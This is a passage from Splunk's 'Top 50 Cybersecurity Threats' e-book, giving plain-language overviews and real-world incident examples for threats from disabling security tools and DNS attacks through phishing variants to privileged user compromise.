with requests for service, which in turn
effectively chokes them and shuts them down.

Top 50 Cybersecurity Threats | Splunk 41

 Disabling
Security Tools
Sometimes hackers use the very tools meant to protect organizations to gain access to their systems. Microsoft Windows
became the world’s desktop operating system of choice when it was first released in 1985. And while its market share has
gotten smaller in recent years, it still remains a dominant force compared to its distant runner up, Apple OSX. The mass
adoption of Windows, and the fact that it’s easier to fall victim to attacks, such as malware and bots, has made it a favorite
playground for hackers.
That’s partly why Microsoft began installing a native anti-spyware and antivirus program, called Windows Defender, with
the release of Windows Vista. Unfortunately Microsoft didn’t consider that hackers would attack the very thing supposed to
protect Windows users.
Novter, also known as Nodersok or Divergent, was a Trojan attack that took down Windows Defender’s real-time protection
features. Once disabled, the Trojan would download additional malware to the system.

42 Splunk | Top 50 Cybersecurity Threats

 Disabling Security Tools

What How Where

you need the attack the attack
to know: happens: comes from:
An attack centered around disabling security
Hackers use a variety of techniques to avoid The fingerprints of this attack revolve around
tools can originate anywhere because these
detection and operate without barriers. This hackers trying to disable various security
types of attacks can target an almost endless
often involves modifying the configuration of mechanisms. They may attempt to gain
list of tools. The Nodersok attack, for example,
security tools, such as firewalls, to get around access to registry files, where much of the
mostly attacked PC users in the U.S. and the
them or explicitly disabling them to prevent configuration for Windows and various other
U.K. (81%).
them from running at all. programs live. The hackers may also attempt to
shut down security-related services.

Other times, attackers attempt various tricks

to prevent specific programs from running,
such as adding certificates that assign security
tools to a blacklist, preventing those protection
tools from running altogether.

Top 50 Cybersecurity Threats | Splunk 43

 DNS Attacks

DNS
Amplification
In February 2022, hackers launched massive, amplified distributed denial-of-service (DDoS) attacks through Mitel, a global
business communications company. The attack pummeled financial institutions, broadband ISPs, logistics and gaming
companies, and other organizations. Able to sustain DDoS attacks for up to 14 hours, with a record-breaking amplification
factor of almost 4.3 billion to one, attacks like this are capable of shutting down voice communications and other services for
entire organizations with a single malicious network packet.

44 Splunk | Top 50 Cybersecurity Threats

 DNS Amplification

What How Where

you need the attack the attack
to know: happens: comes from:
In a DNS amplification attack, the attacker
Though DNS amplification, a type of DDoS Similar to a DNS hijacking attack, the relatively
floods a website with so many fake DNS
attack, has been around for a long time, the primitive nature of the attack means it can
lookup requests that it eats up the network
exploitation techniques keep evolving. The originate from anywhere in the world, be it
bandwidth until the site fails. Where DNS
attack is similar to DNS hijacking in the sense nation-state hackers or a lone wolf.
hacking might direct traffic to another site, a
that it takes advantage of the internet’s
DNS amplification attack prevents the site
directory by misconfiguring it. But the way the
from loading.
attacks occur are slightly different.
The difference between the two attacks is
A DNS amplification attack typically involves
further illustrated by the word “amplification.”
sending a small amount of information to a
In this attack, hackers make the DNS requests
vulnerable network service that causes it to
in a way that requires a more intensive
reply with a much larger amount of data. By
response. For example, a hacker might request
directing that response at a victim, an attacker
more than just the domain name. The attacker
can put in a relatively low amount of effort
might also ask for the entire domain, known as
while making other people’s machines do all
an “ANY record,” which requests the domain
the work of flooding a selected target offline.
along with the subdomain, mail servers, backup
servers, aliases and more.

Now imagine several of these “ANY” requests

coming in at once. The amplified traffic is
enough to take the site offline.

Top 50 Cybersecurity Threats | Splunk 45

 DNS Attacks

DNS
Hijacking
On a Thursday morning in 2017, WikiLeaks readers woke up
expecting to find the latest state secret released on the
whistleblowing website, only to discover a message from a hacker
collective called OurMine announcing that they were in control of the domain.
Wikileaks founder Julian Assange quickly took to Twitter to clarify that the takedown was not a traditional hack, but instead
a domain name system (DNS) attack.

46 Splunk | Top 50 Cybersecurity Threats

 DNS Hijacking

What How Where

you need the attack the attack
to know: happens: comes from:
There is no one singular profile of a DNS
DNS is often called the Achilles heel of the The attack works when hackers exploit the way
hijacker, largely because the attack can
internet, or the internet’s phonebook, because DNS communicates with an internet browser.
occur as easily as a social engineering attack
it plays a critical role in routing web traffic. The The system acts as a phone book, translating
in which someone calls a domain provider
DNS is the protocol used to map domain names a domain — like NYTimes.com — into an IP
and tricks them into changing a DNS entry.
to IP addresses. It has been proven to work well address. The DNS then looks up and finds
for its intended function. But DNS is notoriously which global server is hosting that site and Some of the more prominent DNS
vulnerable to attack, attributed in part to its then directs traffic to it. The attack happens hijacking attacks have been attributed
distributed nature. DNS relies on unstructured when a hacker is able to disrupt the DNS to hacking collectives such as OurMine
connections between millions of clients and lookup and then either push the site offline or in the Wikileaks case or the Syrian
servers over inherently insecure protocols. redirect traffic to a site that the hacker controls. Electronic Army in takedowns of The New
York Times and The Washington Post.
The gravity and extent of the importance of
securing DNS from attacks is undeniable. The
fallout of compromised DNS can be disastrous.
Not only can hackers bring down an entire
business, they can intercept confidential
information, emails and login credentials as well.

The U.S. Department of Homeland Security

2019’s Cybersecurity and Infrastructure
Security Agency (CISA) raised concerns
about high-profile DNS hijacking attacks
against infrastructure, both in the United
States and abroad.
Top 50 Cybersecurity Threats | Splunk 47
 DNS Attacks

DNS
Tunneling
A hacker group known as OilRig has made regular attacks on
various governments and businesses in the Middle East using a
variety of tools and methods over the past several years.
An essential element of its efforts to disrupt daily
operations and exfiltrate data is maintaining a connection
between its command-and-control server and the
system it’s attacking using DNS tunneling.

48 Splunk | Top 50 Cybersecurity Threats

 DNS Tunneling

What How Where

you need the attack the attack
to know: happens: comes from:
The traffic passing through DNS often goes With DNS tunneling, an attacker can While there are DNS tunneling tools readily
unmonitored, since it’s not designed for data bypass security systems (tunneling under available for download, attackers wishing to do
transfer, leaving it vulnerable to several kinds or around them, so to speak) by redirecting more than bypass a hotel or airline’s paywall
of attacks, including DNS tunneling, which traffic to their own server, setting up a for internet access require more sophisticated
happens when an attacker encodes malicious connection to an organization’s network. knowledge. In addition, because DNS was
data into a DNS query: a complex string of Once that connection is active, command designed only to resolve web addresses,
characters at the front of a URL. and control, data exfiltration and a it’s a very slow system for data transfer.
number of other attacks are possible.
There are valid uses for DNS tunneling —
anti-virus software providers use it to send
updated malware profiles to customers in
the background, for example. Because of the
possibility of legitimate use, it’s important
for organizations to monitor their DNS traffic
thoroughly, allowing only trustworthy traffic to
continue flowing through the network.

Top 50 Cybersecurity Threats | Splunk 49

 DoS
Attack
Almost two decades ago, a 16-year-old hacker known as Mafiaboy launched one of the
most famous denial-of-service (DoS) attacks that took several major sites offline, including CNN,
eBay, Amazon and Yahoo. According to reports, Mafiaboy broke into dozens of networks to install malware designed to
flood targets with attack traffic. Because many sites were underprepared for such an assault, the attack lasted about
a week as the targeted organizations struggled to figure out what happened and how to get back online. Mafiaboy was
eventually arrested and sentenced to juvenile detention.
Twenty years later, DoS attacks (many of which are DDoS) continue to be on the rise and are some of the most common
attacks faced by organizations, targeting around a third of all businesses.

50 Splunk | Top 50 Cybersecurity Threats

 DoS Attack

What How Where

you need the attack the attack
to know: happens: comes from:
DoS attacks occur in one of two ways: by
A DoS attack is where cyberattackers make DoS attacks can originate from anywhere
flooding or crashing a targeted network.
a machine or network inaccessible for its in the world. Attackers can easily mask their
In flood attacks, cybercriminals bombard
intended users. DoS attacks can be executed whereabouts so they can overwhelm victim
victim computers with more traffic than
by either flooding networks with traffic or by computers, execute malware or conduct other
they can handle, causing them to slow
sending information that triggers a system nefarious deeds with the peace of mind that
or shut down altogether. Various flood
slowdown or complete crash. As with DDoS they won’t be detected.
attacks include buffer overflow attacks,
attacks, DoS attacks tend to focus on high-
ICMP flood and SYN flood attacks.
profile organizations or ones with popular,
public-facing websites such as banking, Other DoS attacks exploit vulnerabilities
ecommerce, media or government institutions. that prompt the target system to crash. In
DoS attacks deprive legitimate users of these attacks, bad actors exploit system
the service they want to access and cause vulnerabilities with malware that subsequently
extensive damage to the victim, due to security triggers a crash or severely disrupts the system.
and cleanup costs, loss of reputation, loss of
revenue and customer attrition.

Top 50 Cybersecurity Threats | Splunk 51

 Drive-by
Download
Attack
In January 2020, visitors to the legendary zine and blog site Boing Boing saw a fake Google Play Protect overlay
prompting them to download what was actually a malicious APK that installed a banking Trojan on Android devices.
For Windows users, it appeared as a (fake) Adobe Flash installation page that distributed other malicious programs.
Boing Boing’s content management system had been hacked. Even if the visitor didn’t take the bait, the drive-by
downloads were automatically initiated by JavaScript embedded into the page. While Boing Boing was able to detect
the attack and remove the script relatively quickly, given the site’s five million unique users — former President Barack
Obama among them — the impact could have been disastrous.

52 Splunk | Top 50 Cybersecurity Threats

 Drive-by Download Attack

What How Where

you need the attack the attack
to know: happens: comes from:
A drive-by download refers to the unintentional What makes drive-by downloads different is The rise of prepackaged drive-by download
download of malicious code onto a computer that users do not need to click on anything kits allows hackers of any skill level to launch
or mobile device that exposes users to to initiate the download. Simply accessing or these kinds of attacks. In fact, these kits can
different types of threats. Cybercriminals browsing a website can activate the download. be purchased and deployed without the hacker
use drive-by downloads to steal and collect The malicious code is designed to download writing their own code or establishing their
personal information, inject banking Trojans malicious files onto the victim’s device without own infrastructure for data exfiltration or other
or introduce exploit kits or other malware to the user’s knowledge. A drive-by download abuses. The ease with which these attacks can
user devices. To be protected against drive-by abuses insecure, vulnerable or outdated apps, be executed means that they can come from
downloads, regularly update or patch systems browsers or even operating systems. virtually anywhere.
with the latest versions of apps, software,
browsers and operating systems. It’s also
recommended to stay away from insecure or
potentially malicious websites.

Top 50 Cybersecurity Threats | Splunk 53

 Insider
Threat
Revenge. It’s a tale as old as time. In 2022, an IT specialist was charged for allegedly hacking the server of a Chicago healthcare
organization. He’d had access to the server because he’d been a contractor, and he had motive. He’d been denied a job at
the organization, and a few months later, he was fired by the contracting IT firm. This act of individual retaliation resulted in a
cyberattack that dramatically disrupted medical examinations, treatments and diagnoses for many patients.

54 Splunk | Top 50 Cybersecurity Threats

 Insider Threat

What How Where

you need the attack the attack
to know: happens: comes from:
Inside attackers can be employees in the
An insider threat attack is a malicious assault Malicious insiders have a distinct advantage in
organization with bad intentions or cyberspies
carried out by insiders with authorized that they already have authorized access to an
impersonating contractors, third parties or
access to an organization’s computer organization’s network, information and assets.
remote workers. They may work autonomously,
system, network and resources. In this They may have accounts that give them access
or as part of nation states, crime rings or
assault, attackers often aim to steal classified, to critical systems or data, making it easy for
competing organizations. While they might
proprietary or otherwise sensitive information them to locate it, circumvent security controls
also be remote third-party suppliers or
and assets, either for personal gain or to and send it outside of the organization.
contractors located all over the world, they
provide information to competitors. They
usually have some level of legitimate access
might also try to sabotage your organization
to the organization’s systems and data.
with system disruptions that mean loss of
productivity, profitability and reputation.

Top 50 Cybersecurity Threats | Splunk 55

 IoT
Threats
After a data leak exposed the personal information of over 3,000 users of Ring, a home security provider owned by Amazon,
hackers took advantage of the leak and hijacked video doorbells and smart cameras in people’s homes. In a 2020 class
action lawsuit, dozens of people say they were subjected to harassment, threats and blackmail through their Ring devices.
Researchers say these documented attacks are just the tip of the iceberg, since Ring sold more than 1.4 million video
doorbells in 2020 alone. Ring has since introduced end-to-end video encryption to help protect against future hacks, but
with the increasing ubiquity of IoT devices, this won’t be the last of these kinds of attacks.

56 Splunk | Top 50 Cybersecurity Threats

 IoT Threats

What How Where

you need the attack the attack
to know: happens: comes from:
There are an estimated 13.1 billion connected Hackers and malicious nation states can Attacks can come from anywhere in the
IoT devices globally — a number that exploit vulnerabilities in connected IoT devices world. But because many verticals such as
is projected to increase to 30 billion by with sophisticated malware to gain access to government, manufacturing and healthcare
2030. These devices often lack security a network so they can monitor users or steal are deploying IoT infrastructure without
infrastructure, creating glaring vulnerabilities intellectual property, classified or personally proper security protections, these systems are
in the network that exponentially grow the identifying data and other critical information. targets for attacks by hostile nation states and
attack surface and leave it susceptible Once they infiltrate an IoT system, hackers can sophisticated cybercrime organizations. Unlike
to malware. Attacks delivered over IoT also use their newly gained access for lateral attacks against technology infrastructure,
devices can include DDoS, ransomware movement to other connected devices or to attacks against connected civic or healthcare
and social engineering threats. gain entry to a greater network for various systems could lead to widespread disruption,
malicious purposes. panic and human endangerment.

Top 50 Cybersecurity Threats | Splunk 57

 IoMT
Threats
The prevalence and complexity of attacks on healthcare organizations —
as well as the risk to patient confidentiality and safety — means providers are
coming under fire when it comes to medical device security. Due to attacks
such as the WannaCry ransomware attack, lawmakers have outlined the
severity of cybersecurity issues plaguing legacy software and equipment. The FDA has also issued updated guidance
for device manufacturers, but companies aren’t required to follow these guidelines since they’re not legal mandates.

58 Splunk | Top 50 Cybersecurity Threats

 IoMT Threats

What How Where

you need the attack the attack
to know: happens: comes from:
The Internet of Medical Things (IoMT) has Because digital technologies age faster than IoMT attackers have the ability and resources
transformed healthcare as we know it, their physical counterparts — which typically to pinpoint healthcare providers with
especially in the era of COVID-19. Leveraging have a long product life cycle — outdated ambiguous security ownership, as well as poor
IoMT has the power to unleash countless equipment and software are creating serious asset or inventory visibility, and out-of-date
opportunities in diagnosing, treating and cybersecurity vulnerabilities for both hospitals systems and devices.
managing a patient’s health and wellness, and patients. Currently, manufacturers don’t
and holds the key to lowering cost while allow customers to troubleshoot and patch
improving quality of care. But as the number their own devices, and will even go so far as
of connected devices invariably grows, so to void warranties if they do. Compounded
does the cybersecurity risk. As of 2020, more with lack of encryption, hardcoded credentials
than 25% of cyberattacks in healthcare and lax security controls, there’s little that
delivery organizations involve IoMT. healthcare organizations can do to mitigate
risk where legacy devices are involved.

Top 50 Cybersecurity Threats | Splunk 59

 Macro
Viruses
One of the most infamous virus incidents of all time, the Melissa virus of the
late ‘90s, was none other than a macro virus. A Melissa-infected PC would
hijack the user’s Microsoft Outlook email system and send virus-laden
messages to the first 50 addresses in their mailing lists. The virus propagated at an
incredible speed, and caused astounding damage worldwide: an estimated $80 million
for cleaning and repairing affected systems and networks. Though the heyday of the
macro virus may have passed, these attacks continue, and they’re not just targeting
Microsoft Windows anymore: recent attacks have targeted Mac users as well

60 Splunk | Top 50 Cybersecurity Threats

 Macro Viruses

What How Where

you need the attack the attack
to know: happens: comes from:
A macro virus is a computer virus written in Macro viruses are often spread through While macro viruses have fallen out of
the same macro language that is used for phishing emails containing attachments vogue for malicious attacks — primarily
software applications. Some applications, that have been embedded with the virus. because antivirus software is better able
like Microsoft Office, Excel and PowerPoint Because the email looks like it came from to detect and disable them — they still
allow macro programs to be embedded in a credible source, many recipients open it. represent a major threat. A cursory Google
documents such that the macros are run Once an infected macro is executed, it can search for “macro virus” yields instructions
automatically when the document is opened, jump to every other document on the user’s for creating macro viruses and tools that
and this provides a distinct mechanism computer and infect them. Macro viruses assist non-coders in creating these viruses.
by which malicious computer instructions spread whenever a user opens or closes an In theory, anyone with internet access
can spread. This is one reason it can be infected document. They run on applications can create a macro virus with ease.
dangerous to open unexpected attachments and not on operating systems. The most
in emails, or emails from unrecognized common methods of spreading macro
senders. Many antivirus programs can detect viruses are sharing files on a disk or network
macro viruses, however the macro virus’ and opening a file attached to an email.
behavior can still be difficult to detect.

Top 50 Cybersecurity Threats | Splunk 61

 Malicious
PowerShell
Attack sequences that exploit the ever-popular PowerShell are broadly attractive to top cybercriminals and cyberespionage
groups because they make it easy to propagate viruses across a network. Notorious bad actors such as APT29
(aka Cozy Bear) use PowerShell scripts to gather critical intelligence to inform even more sophisticated cyberattacks.
In 2020, the notorious threat group APT35 (aka “Charming Kitten”) abused Powershell in a ransomware attack on a charity
organization and to harvest and exfiltrate data from a U.S. local government.

62 Splunk | Top 50 Cybersecurity Threats

 Malicious PowerShell

What How Where

you need the attack the attack
to know: happens: comes from:
PowerShell is a command-line and scripting Since PowerShell is a scripting language This type of attack is more sophisticated
tool developed by Microsoft and built on that runs on the majority of enterprise than other methods, and is usually executed
.NET (pronounced “dot net”), that allows machines — and since most companies by a power hacker who knows exactly
administrators and users to change system don’t monitor code endpoints — the logic what they’re doing (versus an amateur who
settings as well as to automate tasks. The behind this type of attack is abundantly clear. might resort to brute force attacks). Ever
command-line interface (CLI) offers a It’s easy to gain access, and even easier for stealth in their approach, they’re adept
range of tools and flexibility, making it a attackers to take root in the system. Malware at covering their tracks, and know how
popular shell and scripting language. Bad doesn’t need to be installed in order to run to move laterally across a network.
actors have also recognized the perks or execute the malicious script. This means
of PowerShell — namely, how to operate the hacker can effortlessly bypass detection
undetected on a system as a code endpoint, — circumventing the analysis of executable
performing actions behind the scenes. files to wreak havoc at their leisure.

Top 50 Cybersecurity Threats | Splunk 63

 Man-in-
the-Middle
Attack
In early 2022, Microsoft discovered a phishing campaign targeting Office365 users. The attackers spoofed a phony 365 login
page, gathering credentials for later abuse and misuse. To do this, the attackers used a Evilginx2 phishing kit — a
​​ man-in-the-
middle (MITM) attack framework used for phishing login credentials along with session cookies, allowing bad actors to bypass
two-factor authentication — in order to hijack the authentication process. Microsoft added in its blog post, “Note that this is not
a vulnerability in MFA; since AiTM phishing steals the session cookie, the attacker gets authenticated to a session on the user’s
behalf, regardless of the sign-in method the latter uses.”

64 Splunk | Top 50 Cybersecurity Threats

 Man-in-the-Middle Attack

What How Where

you need the attack the attack
to know: happens: comes from:
The MITM attack, also known as adversary-in- Virtually anyone could execute a man-in-the- Because improvements in security
the-middle (AiTM), sets up a proxy server that middle attack. Since the implementation of technologies have made MITM attacks more
intercepts the victim’s log-in session, so that HTTPS Everywhere, however, these kinds of difficult to execute, the only groups attempting
the malicious actor can act as a relay between attacks are more difficult to execute, and are them are sophisticated hackers or state actors.
the two parties or systems — thereby gaining therefore more rare. In an MITM attack, the In 2018, the Dutch police found four members
access to and/or pilfering sensitive information. hacker sits between the user and the real of the Russian hacking group Fancy Bear
This type of attack allows a malicious actor website (or other user) and passes the data parked outside of the Organization for the
to intercept, send and receive data intended between them, exfiltrating whatever data they Prohibition of Chemical Weapons in Holland,
for somebody else — or that’s not meant to like from the interaction. attempting an MITM infiltration to steal
be sent at all — without either outside party employee credentials. Later that year, the U.S.
knowing, until it is too late. and UK governments released warnings that
Russian state-sponsored actors were actively
targeting routers in homes and enterprises
for the purpose of MITM exfiltration.

Top 50 Cybersecurity Threats | Splunk 65

 Masquerade
Attack
Many of us still remember when Target experienced
a massive credit card breach affecting over forty million
customer accounts. The states’ investigation into the breach revealed that attackers stole the credentials of Target’s
HVAC contractor, Fazio Mechanical Services. After using the third-party vendor’s details to get into Target’s internal web
application, they installed malware on the system and captured names, phone numbers, payment card numbers, credit
card verification codes and other highly sensitive information.

66 Splunk | Top 50 Cybersecurity Threats

 Masquerade Attack

What How Where

you need the attack the attack
to know: happens: comes from:
A masquerade attack happens when a A masquerade attack can happen From an insider angle, attackers can get
bad actor uses a forged or legitimate after users’ credentials are stolen, or access by spoofing login domains or using
(but stolen) identity to gain unauthorized through authenticating on unguarded keyloggers to steal legitimate authentication
access to someone’s machine or an machines and devices which have credentials. The attacks can also happen
organization’s network via legitimate access to the target network. physically by taking advantage of targets who
access identification. Depending on leave machines unguarded — like a coworker
the level of access the permissions accessing someone’s laptop while they’re
provide, masquerade attacks could give away. Generally speaking, weak authentication
attackers access to an entire network. methods that can be duped by external parties
are usually the source of the problem.

Top 50 Cybersecurity Threats | Splunk 67

 Meltdown
and Spectre
Attack
Most cybersecurity attacks exploit a vulnerability, such as a coding
mistake or bad design. But not all attacks are created equal. In 2018,
two Google researchers discovered a new type of attack that affected
all computer chip makers and potentially exposed billions to the
meltdown and spectre attack.

68 Splunk | Top 50 Cybersecurity Threats

 Meltdown and Spectre Attack

What How Where

you need the attack the attack
to know: happens: comes from:
The meltdown and spectre attack exploits A meltdown and spectre attack exploits The spectre and meltdown attack can originate
vulnerabilities in computer processors. critical vulnerabilities in modern CPUs that from nearly anywhere, and much of the
These vulnerabilities allow attackers to steal allow unintended access to data in memory research thus far has focused on this attack’s
almost any data that is being processed storage. The attack breaks the norm of unique nature instead of who’s behind it.
on the computer. This is an attack that computing where programs are not allowed
strikes at the core of computer security, to read data from other programs. The type
which relies on the isolation of memory to of information that attackers typically target
protect a user’s information. A “meltdown” are passwords stored in a password manager
refers to the breakdown of any protective or browser as well as emails, financial records
barrier between an operating system and and personal information such as photos
a program, while “spectre” indicates the and instant messages. But this attack is
breakdown between two applications not limited to personal computers. It can
that keep information from each other. target almost any device with a processor,
such as a mobile phone or tablet.

Top 50 Cybersecurity Threats | Splunk 69

 Network
Sniffing
Smart locks are a new type of device intended to protect your home and make
it easier to enter with the click (or, more appropriately, tap) of a button. But
taking a more futuristic approach to fortifying your house can have serious
consequences, security researchers have found. One smart lock, not-so-
aptly marketed as the “smartest lock ever,” could be intercepted via network
traffic between the mobile app and the lock itself. Scarier yet, this can be done
through inexpensive, readily available network-sniffing devices.

70 Splunk | Top 50 Cybersecurity Threats

 Network Sniffing

What How Where

you need the attack the attack
to know: happens: comes from:
Network sniffing, also known as packet Much like wiretapping scenarios in which Network sniffing is often conducted legally
sniffing, is the real-time capturing, someone listens in on phone calls for by organizations like ISPs, advertising
monitoring and analysis of data flowing sensitive details, network sniffing works in the agencies, government agencies and others
within a network. Whether it’s via hardware, background, silently listening in as information who need to verify network traffic.
software or a combination of both, bad is exchanged between entities on a network.
But it can also be launched by hackers
actors use sniffing tools to eavesdrop on This happens when attackers place a sniffer
doing it for the “lulz” or nation-states
unencrypted data from network packets, on a network via the installation of software
looking to pilfer intellectual property. Like
such as credentials, emails, passwords, or hardware plugged into a device that allows
ransomware, network sniffers can be
messages and other sensitive information. it to intercept and log traffic over the wired or
injected into the network by getting the
wireless network the host device has access
right person to click on the right link. Insider
to. Due to the complexity inherent in most
threats with access to sensitive hardware
networks, sniffers can sit on the network for a
could also be a vector for attack.
long time before being detected.

Top 50 Cybersecurity Threats | Splunk 71

 Open
Redirection
In 2022, yet another phishing campaign targeting Facebook users was discovered to
have netted hundreds of millions of credentials. The technique used was a common
one: A link is sent via DM from a compromised Facebook account, then that link performs a series of redirects, often
through malvertising pages to rack up views and clicks (and revenue for the attacker), ultimately landing on a fake page.
Though the technique of host redirection, also known as open redirect, isn’t new, the sheer scale of this campaign is
remarkable. Researchers found that just one phishing landing page out of around 400 had 2.7 million visitors in 2021, and
8.5 by June of 2022. In an interview with researchers, the attacker boasted of making $150 for every thousand visits from
U.S. Facebook users, which would put the bad actor’s total earnings at $59 million.

72 Splunk | Top 50 Cybersecurity Threats

 Open Redirection

What How Where

you need the attack the attack
to know: happens: comes from:
Host redirection attacks are very common and The hacker might send a phishing email that The origins of this attack are not as important
increasingly subversive, as hackers become includes a copycat of the website’s URL to the as the target. This attack is usually aimed at
more creative about how they lure their targets. unsuspecting victim. If the website appears unsophisticated internet users who won’t
Attackers use URL redirection to gain a user’s legitimate, users might inadvertently share notice that the URL of their favorite domain
trust before they inevitably strike. They’ll personal information by filling out any prompts is a letter or two off. And because this attack
typically use embedded URLs, an .htaccess file or forms that appear. Attackers can take this to prides itself on simplicity (it can be as easy as
or employ phishing tactics in order to redirect the next level by embedding faux command- registering a domain name), it can originate
traffic to a malicious website. and-control domains in malware, and hosting from almost anywhere.
malicious content on domains that closely
mimic corporate servers.

Top 50 Cybersecurity Threats | Splunk 73

 Pass
the Hash
The infamous breach of over 40 million Target customer
accounts was successful partly due to the well-known attack
technique called pass the hash (PtH). The hackers used PtH to gain
access to an NT hash token that would allow them to log-in to the Active
Directory administrator’s account without the plaintext password — thereby giving them the necessary privileges to create
a new domain admin account, later adding it to the Domain Admins group. This root in the system gave them the opportunity
to steal personal information and payment card details from Target’s customers.

74 Splunk | Top 50 Cybersecurity Threats

 Pass the Hash

What How Where

you need the attack the attack
to know: happens: comes from:
Pass the hash allows an attacker to On systems using NTLM authentication, This type of attack is more sophisticated
authenticate a user’s password with the a user’s password or passphrase is never than other methods, and is usually
underlying NTLM or LanMan hash instead of submitted in cleartext. Instead, it’s sent executed by highly organized, motivated
the associated plaintext password. Once the as a hash in response to a challenge- threat groups with their sights set on a
hacker has a valid username along with their response authentication scheme. When specific organization or person, and with
password’s hash values, they can get into the this happens, valid password hashes for a mind to political or financial gain.
user’s account without issue, and perform the account being used are captured
actions on local or remote systems. Essentially, using a credential access technique.
hashes replace the original passwords that
they were generated from.

Top 50 Cybersecurity Threats | Splunk 75

 Phishing
When it comes to phishing attacks, there are a few that stand out above
the rest — like the now-infamous attack on Sony’s network. Hackers executed
the attack by sending phishing emails requesting verification for Apple IDs to system
engineers, network administrators and other unsuspecting employees with system credentials. The attackers absconded with
gigabytes worth of files, which included emails, financial reports and digital copies of recently released films. On top of that, the
malicious actors then infused Sony’s workstation computers with malware that erased the machines’ hard drives. A few weeks
later, the FBI formally pointed to the North Korean government as the masterminds behind the attack

76 Splunk | Top 50 Cybersecurity Threats

 Phishing

What How Where

you need the attack the attack
to know: happens: comes from:
A phishing attack tricks everyday consumers, Typically you’ll be lured by an email Just a few decades ago, a large number of
users or employees into clicking on a malicious impersonating someone you know — phishing attacks were sourced to Nigeria in
link, often driving them to a bogus site to a message that appears to be from a manager what were known as 419 scams, due to their
provide personally identifiable information or coworker, for example — compelling fraud designation in the Nigerian criminal
such as banking account numbers, credit you to open malicious attachments or code. Today, phishing attacks originate from
card information or passwords, delivered via click links that lead you to webpages all over the world, with many occurring in
email, direct message or other communication. practically identical to legitimate sites. BRIC countries (Brazil, Russia, India and China),
Be wary — while these bogus sites may according to the InfoSec Institute. Because of
look convincing, attackers will harvest any the ease and availability of phishing toolkits,
information you submit to them. Or they even hackers with minimal technical skills
may launch malware aimed at stealing funds can launch phishing campaigns. The people
from your accounts, personally identifiable behind these campaigns run the gamut from
customer information or other critical assets. individual hackers to organized cybercriminals.

Top 50 Cybersecurity Threats | Splunk 77

 Phishing

Phishing
Payloads
One of the biggest cybercrimes ever — with the highest number of defendants charged for the same crime — was what the
FBI called Operation Phish Phry. The attack sparked a multinational phishing investigation after targeting hundreds of bank
and credit card customers, all of whom received emails with links to fake, but authentic-looking, financial websites. On the
site, targets were asked to enter their account numbers and passwords into fraudulent forms.

78 Splunk | Top 50 Cybersecurity Threats

 Phishing Payloads

What How Where

you need the attack the attack
to know: happens: comes from:
Despite its simplicity, phishing remains This attack has a typical attack pattern: Because this attack doesn’t require a high
the most pervasive and dangerous First, the attacker sends a phishing email level of sophistication, and because phishing
cyberthreat. In fact, research shows that and the recipient downloads the attached is at the center of most cyberattacks, it
as many as 91% of all successful attacks file, which is typically a .docx or .zip file with can originate from anywhere in the world.
are initiated via a phishing email. an embedded .lnk file. Second, the .lnk file Operation Phish Phry is a perfect example of
executes a PowerShell script and lastly this. In this attack, the FBI arrested more than
These emails use fraudulent domains, email
the Powershell script executes a reverse 50 people in California, Nevada, and North
scraping techniques, familiar contact names
shell, rendering the exploit successful. Carolina, while also charging about 50 Egyptian
inserted as senders, and other tactics to
nationals in connection with the attack.
lure targets into clicking a malicious link,
opening an attachment with a nefarious
payload, or entering sensitive personal
information that perpetrators may intercept.
The “payload” refers to the transmitted data
that is the intended message. Headers and
metadata are only sent to enable the delivery
of the payload to the correct person.

Top 50 Cybersecurity Threats | Splunk 79

 Phishing

Spear
Phishing
These days spear phishers are not only targeting bigger fish, they’re taking a page from the book of romance
scams, luring victims with attractive fake profiles to get them to download malware onto their computers. In 2021, researchers
identified a years-long social engineering and targeted malware attack sourced to the renowned Iranian-state aligned threat
actor TA456. Using a fake social media profile “Marcella Flores,” TA456 built a romantic relationship with an employee of a small
aerospace defense contractor subsidiary. The attacker cashed in a few months later by sending out a large malware file via an
ongoing corporate email communication chain with the aim of conducting reconnaissance. Once the malware, dubbed LEMPO,
infiltrated the machine, it exfiltrated data and sent highly sensitive information back to the attacker, while obfuscating its
whereabouts to evade detection.

80 Splunk | Top 50 Cybersecurity Threats

 Spear Phishing

What How Where

you need the attack the attack
to know: happens: comes from:
A subset of phishing, spear phishing occurs Spear phishers do their research to identify Individuals and organizations alike are behind
when cybercriminals selectively target targets and their professional positions this attack. However, many high-profile spear
victims with a specific, personalized email using social media sites like LinkedIn. From phishing attempts are sourced to state-
message to trick targets or a target company’s there, they spoof addresses to send highly sponsored cybercrime organizations, which
employees into giving away financial or personalized, authentic-looking messages have the resources to research their targets
proprietary data, or unlocking access to the to infiltrate the target’s infrastructure and and bypass strong security filters.
network. Spear phishers target individuals who systems. Once hackers gain access to the
either have access to sensitive information environment, they attempt to carry out even
or are weak links to the network. High- more elaborate schemes.
value targets, such as C-level executives,
company board members or administrators
with elevated privileges, are especially
vulnerable, since they have access to critical
systems and proprietary information.

Top 50 Cybersecurity Threats | Splunk 81

 Phishing

Whale
Phishing
(Whaling)
Why go after little phish when you can phish a whale? In 2020,
Australian hedge fund Levitas Capital found that out the hard way
when attackers launched a stealthy whaling attack aimed directly at one of the founders. The bad actors gained entry to the
hedge fund’s network after sending the executive a fake Zoom link that installed malware once it was clicked. The malicious
code allowed the attackers to infiltrate the targeted email account and subsequently create bogus invoices to the fund’s
trustee and third party administrator, which initiated and approved cash transfer requests resulting in $8.7 million in theft.
The bogus invoices also included a request for a $1.2 million payment to suspicious private equity firm Unique Star Trading.
The losses were so damaging and extensive that the firm was eventually forced to permanently close.

82 Splunk | Top 50 Cybersecurity Threats

 Whale Phishing (Whaling)

What How Where

you need the attack the attack
to know: happens: comes from:
Whaling is when hackers go after one single, The technique used in a whaling attack is a Phishing is the most common entry point for
high-value target, such as a CEO. The target is classic phishing practice. The target receives a cyberattack, which means a whaling attack
always someone specific, whereas a phishing an authentic-looking email, usually asking them can originate from anywhere in the world.
email may go after anyone at a company. The to click on a link that contains malicious code
The Levitas Capital attack, for example, was
hackers also usually go after high-profile or leads to a website that asks for sensitive
sourced to a collective of cybercriminals from
targets because they may possess important information, such as a password.
various regions, with payments sent to Bank of
or sensitive information.
China and United Overseas Bank in Singapore.

Top 50 Cybersecurity Threats | Splunk 83

 Privileged User
Compromise
In early 2022, the criminal hacking group Lapsus$, allegedly run by a teenager from
Oxford, England, boasted publically that it had successfully hacked Okta, a single
sign-on provider used by thousands of organizations and governments worldwide.
Lapsus$ gained access to a “super user” administrative account for Okta via a third-party support engineer and had
access to the employee’s laptop for five days, including privileged access to some Okta systems. The cybercrime group
